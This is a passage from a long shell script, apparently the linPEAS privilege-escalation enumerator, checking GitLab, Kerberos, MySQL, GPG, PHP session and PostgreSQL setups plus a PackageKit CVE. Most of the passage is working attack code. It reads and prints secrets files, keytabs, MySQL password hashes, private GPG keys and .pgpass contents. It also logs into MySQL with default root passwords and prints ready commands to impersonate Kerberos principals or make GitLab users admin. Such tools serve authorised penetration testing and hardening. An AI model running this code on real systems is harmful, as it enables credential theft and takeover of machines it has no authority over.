account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" 10944 echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" 10945 echo "" 10946 fi 10947 if [ "$(command -v gitlab-backup || echo -n '')" ]; then 10948 echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" 10949 echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" 10950 echo "" 10951 fi 10952 #Check gitlab files 10953 printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do 10954 if echo $f | grep -q secrets.yml; then 10955 echo "Found $f" | sed "s,$f,${SED_RED}," 10956 cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" 10957 elif echo $f | grep -q gitlab.yml; then 10958 echo "Found $f" | sed "s,$f,${SED_RED}," 10959 cat "" | grep -A 4 "repositories:" 10960 elif echo $f | grep -q gitlab.rb; then 10961 echo "Found $f" | sed "s,$f,${SED_RED}," 10962 cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," 10963 fi 10964 echo "" 10965 done 10966 echo "" 10967 fi 10968 10969 fi 10970 10971 if check_mitre_filter "T1555.001"; then 10972 if [ "$PSTORAGE_KCPASSWORD" ] || [ "$DEBUG" ]; then 10973 print_2title "Analyzing kcpassword files" "T1555.001" 10974 print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#kcpassword" 10975 printf "%s\n" "$PSTORAGE_KCPASSWORD" | while read f; do 10976 echo "$f" | sed -${E} "s,.*,${SED_RED}," 10977 base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," 10978 done 10979 echo "" 10980 fi 10981 10982 fi 10983 10984 if check_mitre_filter "T1558.003"; then 10985 kadmin_exists="$(command -v kadmin || echo -n '')" 10986 klist_exists="$(command -v klist || echo -n '')" 10987 kinit_exists="$(command -v kinit || echo -n '')" 10988 if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then 10989 print_2title "Searching kerberos conf files and tickets" "T1558.003" 10990 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/linux-active-directory.html#linux-active-directory" 10991 if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi 10992 if [ "$kinit_exists" ]; then echo "kadmin was found on $kinit_exists" | sed "s,$kinit_exists,${SED_RED},"; fi 10993 if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi 10994 ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" 10995 if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; 10996 else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; 10997 fi 10998 (env || printenv) 2>/dev/null | grep -E "^KRB5" | sed -${E} "s,KRB5,${SED_RED},g" 10999 printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do 11000 if [ -r "$f" ]; then 11001 if echo "$f" | grep -q .k5login; then 11002 echo ".k5login file (users with access to the user who has this file in his home)" 11003 cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" 11004 elif echo "$f" | grep -q keytab; then 11005 echo "" 11006 echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" 11007 klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" 11008 printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do 11009 if [ "$l" ] && echo "$l" | grep -q "@"; then 11010 printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" 11011 #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid 11012 #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that 11013 fi 11014 done 11015 elif echo "$f" | grep -q krb5.conf; then 11016 ls -l "$f" 11017 cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; 11018 elif echo "$f" | grep -q kadm5.acl; then 11019 ls -l "$f" 11020 cat "$f" 2>/dev/null 11021 elif echo "$f" | grep -q sssd.conf; then 11022 ls -l "$f" 11023 cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; 11024 elif echo "$f" | grep -q secrets.ldb; then 11025 echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; 11026 ls -l "$f" 11027 elif echo "$f" | grep -q .secrets.mkey; then 11028 echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; 11029 ls -l "$f" 11030 fi 11031 fi 11032 done 11033 ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" 11034 klist 2>/dev/null || echo_not_found "klist" 11035 echo "" 11036 fi 11037 11038 fi 11039 11040 if check_mitre_filter "T1190"; then 11041 if [ "$PSTORAGE_LOG4SHELL" ] || [ "$DEBUG" ]; then 11042 print_2title "Searching Log4Shell vulnerable libraries" "T1190" 11043 printf "%s\n" "$PSTORAGE_LOG4SHELL" | while read f; do 11044 echo "$f" | grep -E "log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6])" | sed -${E} "s,log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6]),${SED_RED},"; 11045 done 11046 echo "" 11047 fi 11048 11049 fi 11050 11051 if check_mitre_filter "T1552.001"; then 11052 if [ "$PSTORAGE_LOGSTASH" ] || [ "$DEBUG" ]; then 11053 print_2title "Searching logstash files" "T1552.001" 11054 printf "$PSTORAGE_LOGSTASH" 11055 printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do 11056 if [ -r "$d/startup.options" ]; then 11057 echo "Logstash is running as user:" 11058 cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," 11059 fi 11060 cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," 11061 cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," 11062 done 11063 fi 11064 echo "" 11065 11066 fi 11067 11068 if check_mitre_filter "T1552.001"; then 11069 if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then 11070 print_2title "Searching mysql credentials and exec" "T1552.001" 11071 printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do 11072 if [ -f "$d" ] && ! [ "$(basename $d)" = "mysql" ]; then # Only interested in "mysql" that are folders (filesaren't the ones with creds) 11073 echo "Potential file containing credentials:" 11074 ls -l "$d" 11075 if [ "$STRINGS" ]; then 11076 strings "$d" 11077 else 11078 echo "Strings not found, cat the file and check it to get the creds" 11079 fi 11080 else 11081 for f in $(find $d -name debian.cnf 2>/dev/null); do 11082 if [ -r "$f" ]; then 11083 echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," 11084 cat "$f" 11085 fi 11086 done 11087 for f in $(find $d -name user.MYD 2>/dev/null); do 11088 if [ -r "$f" ]; then 11089 echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," 11090 grep -oaE "[-_\.\*a-zA-Z0-9]{3,}" "$f" | grep -v "mysql_native_password" 11091 fi 11092 done 11093 for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do 11094 if [ -r "$f" ]; then 11095 u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) 11096 echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," 11097 fi 11098 done 11099 for f in $(find $d -name my.cnf 2>/dev/null); do 11100 if [ -r "$f" ]; then 11101 echo "Found readable $f" 11102 grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," 11103 fi 11104 done 11105 fi 11106 mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep -Ev '^lib_mysqludf_sys.so:$' | grep "lib_mysqludf_sys\.so") 11107 if [ "$mysqlexec" ]; then 11108 echo "Found $mysqlexec. $(whereis lib_mysqludf_sys.so)" 11109 echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," 11110 fi 11111 done 11112 fi 11113 echo "" 11114 #-- SI) Mysql version 11115 if [ "$(command -v mysql || echo -n '')" ] || [ "$(command -v mysqladmin || echo -n '')" ] || [ "$DEBUG" ]; then 11116 print_2title "MySQL version" "T1552.001" 11117 mysql --version 2>/dev/null || echo_not_found "mysql" 11118 mysqluser=$(systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1) 11119 if [ "$mysqluser" ]; then 11120 echo "MySQL user: $mysqluser" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," 11121 fi 11122 echo "" 11123 echo "" 11124 #-- SI) Mysql connection root/root 11125 print_list "MySQL connection using default root/root ........... " 11126 mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) 11127 if [ "$mysqlconnect" ]; then 11128 echo "Yes" | sed -${E} "s,.*,${SED_RED}," 11129 mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," 11130 else echo_no 11131 fi 11132 #-- SI) Mysql connection root/toor 11133 print_list "MySQL connection using root/toor ................... " 11134 mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) 11135 if [ "$mysqlconnect" ]; then 11136 echo "Yes" | sed -${E} "s,.*,${SED_RED}," 11137 mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," 11138 else echo_no 11139 fi 11140 #-- SI) Mysql connection root/NOPASS 11141 mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) 11142 print_list "MySQL connection using root/NOPASS ................. " 11143 if [ "$mysqlconnectnopass" ]; then 11144 echo "Yes" | sed -${E} "s,.*,${SED_RED}," 11145 mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," 11146 mysql -u root -e "SELECT User,Host,plugin FROM mysql.user;" 2>/dev/null | sed -${E} "s,auth_socket|unix_socket|plugin,${SED_RED},g" 11147 mysql -u root -e "SHOW VARIABLES LIKE 'secure_file_priv'; SHOW VARIABLES LIKE 'local_infile';" 2>/dev/null | sed -${E} "s,secure_file_priv|local_infile,${SED_RED},g" 11148 else echo_no 11149 fi 11150 echo "" 11151 fi 11152 ### This section checks if MySQL (mysqld) is running as root and if its version is 4.x or 5.x to refer a known local privilege escalation exploit! ### 11153 # Find the mysqld process 11154 process_info=$(ps aux | grep '[m]ysqld' | head -n1) 11155 if [ -z "$process_info" ]; then 11156 echo "MySQL process not found." | sed -${E} "s,.*,${SED_GREEN}," 11157 else 11158 # Extract the process user 11159 mysqluser=$(echo "$process_info" | awk '{print $1}') 11160 # Get the MySQL version string 11161 version_output=$(mysqld --version 2>&1) 11162 # Extract the version number (expects format like X.Y.Z) 11163 version=$(echo "$version_output" | grep -oE '[0-9]+\.[0-9]+\.[0-9]+' | head -n1) 11164 if [ -z "$version" ]; then 11165 echo "Unable to determine MySQL version." | sed -${E} "s,.*,${SED_GREEN}," 11166 else 11167 # Extract the major version number (X from X.Y.Z) 11168 major_version=$(echo "$version" | cut -d. -f1) 11169 # Check if MySQL is running as root and if the version is either 4.x or 5.x 11170 if [ "$mysqluser" = "root" ] && { [ "$major_version" -eq 4 ] || [ "$major_version" -eq 5 ]; }; then 11171 echo "MySQL is running as root with version $version. This is a potential local privilege escalation vulnerability!" | sed -${E} "s,.*,${SED_RED}," 11172 echo "\tRefer to: https://www.exploit-db.com/exploits/1518" | sed -${E} "s,.*,${SED_YELLOW}," 11173 echo "\tRefer to: https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf" | sed -${E} "s,.*,${SED_YELLOW}," 11174 else 11175 echo "MySQL is running as user '$mysqluser' with version $version." | sed -${E} "s,.*,${SED_GREEN}," 11176 fi 11177 ### ------------------------------------------------------------------------------------------------------------------------------------------------ ### 11178 fi 11179 fi 11180 11181 fi 11182 11183 if check_mitre_filter "T1552.004"; then 11184 if [ "$PSTORAGE_PGP_GPG" ] || [ "$DEBUG" ]; then 11185 print_2title "Analyzing PGP-GPG Files (limit 70)" 11186 ( (command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null 11187 ( (command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null 11188 (command -v netpgp || echo_not_found "netpgp") 2>/dev/null 11189 if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pgp"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11190 if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11191 if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.asc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.asc"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.asc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.asc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11192 if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"secring\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "secring.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "secring\.gpg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,secring\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11193 if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"pubring\.kbx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pubring.kbx"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "pubring\.kbx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pubring\.kbx$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11194 if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"trustdb\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "trustdb.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "trustdb\.gpg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,trustdb\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11195 if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"gpg-agent\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gpg-agent.conf"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "gpg-agent\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gpg-agent\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11196 if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"secret\.asc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "secret.asc"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "secret\.asc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,secret\.asc$,${SED_RED},"; done; echo ""; 11197 if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"private-keys-v1\.d/.*\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "private-keys-v1.d/*.key"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "private-keys-v1\.d/.*\.key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,private-keys-v1\.d/.*\.key$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11198 if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gnupg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11199 fi 11200 11201 11202 fi 11203 11204 if check_mitre_filter "T1552.001"; then 11205 if [ "$PSTORAGE_PHP_SESSIONS" ] || [ "$DEBUG" ]; then 11206 print_2title "Analyzing PHP Sessions Files (limit 70)" 11207 ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions 11208 if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sess_*"; fi; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 11209 fi 11210 11211 11212 fi 11213 11214 if check_mitre_filter "T1068"; then 11215 # Contributor: Arjay Saguisa 11216 pk_dpkg_fixed_version() { 11217 pk_fixed_version="" 11218 pk_fixed_label="" 11219 [ -r /etc/os-release ] || return 11220 pk_distro_id="" 11221 pk_distro_codename="" 11222 # shellcheck disable=SC1091 11223 . /etc/os-release 11224 pk_distro_id="${ID:-}" 11225 pk_distro_codename="$(sed -nE 's/^VERSION_CODENAME=\"?([^"]*)\"?$/\1/p' /etc/os-release | head -n1)" 11226 case "${pk_distro_id}:${pk_distro_codename}" in 11227 debian:bullseye|raspbian:bullseye) 11228 pk_fixed_version="1.2.2-2+deb11u1" 11229 pk_fixed_label="Debian/Raspbian bullseye fixed version" 11230 ;; 11231 debian:bookworm|raspbian:bookworm) 11232 pk_fixed_version="1.2.6-5+deb12u1" 11233 pk_fixed_label="Debian/Raspbian bookworm fixed version" 11234 ;; 11235 debian:trixie|raspbian:trixie) 11236 pk_fixed_version="1.3.1-1+deb13u1" 11237 pk_fixed_label="Debian/Raspbian trixie fixed version" 11238 ;; 11239 ubuntu:xenial) 11240 pk_fixed_version="0.8.17-4ubuntu6~gcc5.4ubuntu1.5+esm1" 11241 pk_fixed_label="Ubuntu 16.04 ESM fixed version" 11242 ;; 11243 ubuntu:bionic) 11244 pk_fixed_version="1.1.9-1ubuntu2.18.04.6+esm1" 11245 pk_fixed_label="Ubuntu 18.04 ESM fixed version" 11246 ;; 11247 ubuntu:focal) 11248 pk_fixed_version="1.1.13-2ubuntu1.1+esm1" 11249 pk_fixed_label="Ubuntu 20.04 ESM fixed version" 11250 ;; 11251 ubuntu:jammy) 11252 pk_fixed_version="1.2.5-2ubuntu3.1" 11253 pk_fixed_label="Ubuntu 22.04 fixed version" 11254 ;; 11255 ubuntu:noble) 11256 pk_fixed_version="1.2.8-2ubuntu1.5" 11257 pk_fixed_label="Ubuntu 24.04 fixed version" 11258 ;; 11259 ubuntu:questing) 11260 pk_fixed_version="1.3.1-1ubuntu1.1" 11261 pk_fixed_label="Ubuntu 25.10 fixed version" 11262 ;; 11263 ubuntu:resolute) 11264 pk_fixed_version="1.3.4-3ubuntu1" 11265 pk_fixed_label="Ubuntu 26.04 fixed version" 11266 ;; 11267 esac 11268 } 11269 print_2title "Checking for PackageKit Pack2TheRoot (CVE-2026-41651)" "T1068" 11270 print_info "https://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html" 11271 pk_full="" 11272 pk_version="" 11273 pk_pkg_manager="" 11274 if command -v dpkg-query >/dev/null 2>&1; then 11275 pk_full="$(dpkg-query -W -f='$''{Version}\n' packagekit 2>/dev/null | head -n1)" 11276 if [ -n "$pk_full" ]; then 11277 pk_pkg_manager="dpkg" 11278 pk_version="$(printf '%s' "$pk_full" | sed -E 's/^[0-9]+://; s/[-+~].*$//')" 11279 fi 11280 fi 11281 if [ -z "$pk_version" ] && command -v rpm >/dev/null 2>&1; then 11282 pk_full="$(rpm -qa 2>/dev/null | grep -iE '^PackageKit-[0-9]' | head -n1)" 11283 if [ -n "$pk_full" ]; then 11284 pk_pkg_manager="rpm" 11285 pk_version="$(printf '%s' "$pk_full" | sed -E 's/^[Pp]ackage[Kk]it-([0-9.]+)-.*/\1/')" 11286 fi 11287 fi 11288 if [ -z "$pk_version" ]; then 11289 echo_not_found "PackageKit" 11290 else 11291 echo "PackageKit version detected: ${pk_full:-$pk_version}" 11292 pk_vulnerable="no" 11293 if [ "$pk_pkg_manager" = "dpkg" ] && command -v dpkg >/dev/null 2>&1; then 11294 pk_dpkg_fixed_version 11295 if [ -n "$pk_fixed_version" ]; then 11296 if dpkg --compare-versions "$pk_full" ge "$pk_fixed_version"; then 11297 echo "PackageKit $pk_full is at or above the ${pk_fixed_label}: $pk_fixed_version" | sed -${E} "s,.*,${SED_GREEN}," 11298 else 11299 echo "Vulnerable to CVE-2026-41651 (Pack2TheRoot) - PackageKit $pk_full is below the ${pk_fixed_label}: $pk_fixed_version" | sed -${E} "s,.*,${SED_RED_YELLOW}," 11300 pk_vulnerable="yes" 11301 fi 11302 fi 11303 fi 11304 if [ -z "$pk_fixed_version" ]; then 11305 # Generic upstream range: >= 1.0.2 and <= 1.3.4. Distro backports are handled above. 11306 pk_min_vuln="1.0.2" 11307 pk_max_vuln="1.3.4" 11308 pk_lower="$(printf '%s\n%s\n' "$pk_min_vuln" "$pk_version" | sort -V | head -n1)" 11309 pk_higher="$(printf '%s\n%s\n' "$pk_version" "$pk_max_vuln" | sort -V | tail -n1)" 11310 if [ "$pk_lower" = "$pk_min_vuln" ] && [ "$pk_higher" = "$pk_max_vuln" ]; then 11311 echo "Vulnerable to CVE-2026-41651 (Pack2TheRoot) - PackageKit $pk_version is in the upstream vulnerable range >=1.0.2 <=1.3.4" | sed -${E} "s,.*,${SED_RED_YELLOW}," 11312 pk_vulnerable="yes" 11313 else 11314 echo "PackageKit $pk_version is not in the upstream vulnerable range for CVE-2026-41651" | sed -${E} "s,.*,${SED_GREEN}," 11315 fi 11316 fi 11317 if [ "$pk_vulnerable" = "yes" ]; then 11318 echo "" 11319 print_3title "PackageKit daemon reachability" 11320 if command -v systemctl >/dev/null 2>&1 && systemctl status packagekit >/dev/null 2>&1; then 11321 echo "PackageKit service is loaded/running - exploitation likely possible" | sed -${E} "s,.*,${SED_RED}," 11322 elif command -v pkcon >/dev/null 2>&1 || command -v pkmon >/dev/null 2>&1; then 11323 echo "pkcon/pkmon present - daemon can be activated on demand via D-Bus" | sed -${E} "s,.*,${SED_RED}," 11324 else 11325 echo "PackageKit daemon does not appear to be reachable from this session" | sed -${E} "s,.*,${SED_GREEN}," 11326 fi 11327 echo "" 11328 print_3title "IOC: emitted_finished assertion failures" 11329 if command -v journalctl >/dev/null 2>&1; then 11330 pk_ioc_count="$(journalctl --no-pager -u packagekit 2>/dev/null | grep -c emitted_finished)" 11331 if [ "${pk_ioc_count:-0}" -gt 0 ] 2>/dev/null; then 11332 echo "Found ${pk_ioc_count} 'emitted_finished' crashes in PackageKit logs - possible prior exploitation" | sed -${E} "s,.*,${SED_RED_YELLOW}," 11333 else 11334 echo "No emitted_finished assertion failures found in PackageKit logs" 11335 fi 11336 else 11337 echo "journalctl not available - cannot check IOC" 11338 fi 11339 fi 11340 fi 11341 echo "" 11342 11343 fi 11344 11345 if check_mitre_filter "T1556.003"; then 11346 pamdpass=$(grep -Ri "passwd" ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#") 11347 if [ "$pamdpass" ] || [ "$DEBUG" ]; then 11348 print_2title "Passwords inside pam.d" "T1556.003" 11349 grep -Ri "passwd" ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," 11350 echo "" 11351 fi 11352 11353 fi 11354 11355 if check_mitre_filter "T1552.001"; then 11356 if [ "$PSTORAGE_POSTGRESQL" ] || [ "$DEBUG" ]; then 11357 print_2title "Analyzing PostgreSQL Files (limit 70)" 11358 echo "Version: $(warn_exec psql -V 2>/dev/null)" 11359 if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin*.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; 11360 if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pg_hba.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust|peer,${SED_RED},g"; done; echo ""; 11361 if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postgresql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; 11362 if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgsql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust|peer,${SED_RED},g"; done; echo ""; 11363 if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"\.pgpass$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".pgpass"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "\.pgpass$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pgpass$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 11364 if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin4\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin4.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin4\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgadmin4\.db$,${SED_RED},"; done; echo ""; 11365 fi 11366 11367 if [ "$TIMEOUT" ] && [ "$(command -v psql || echo -n '')" ] || [ "$DEBUG" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. 11368 #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this 11369 print_list "PostgreSQL connection to template0 using 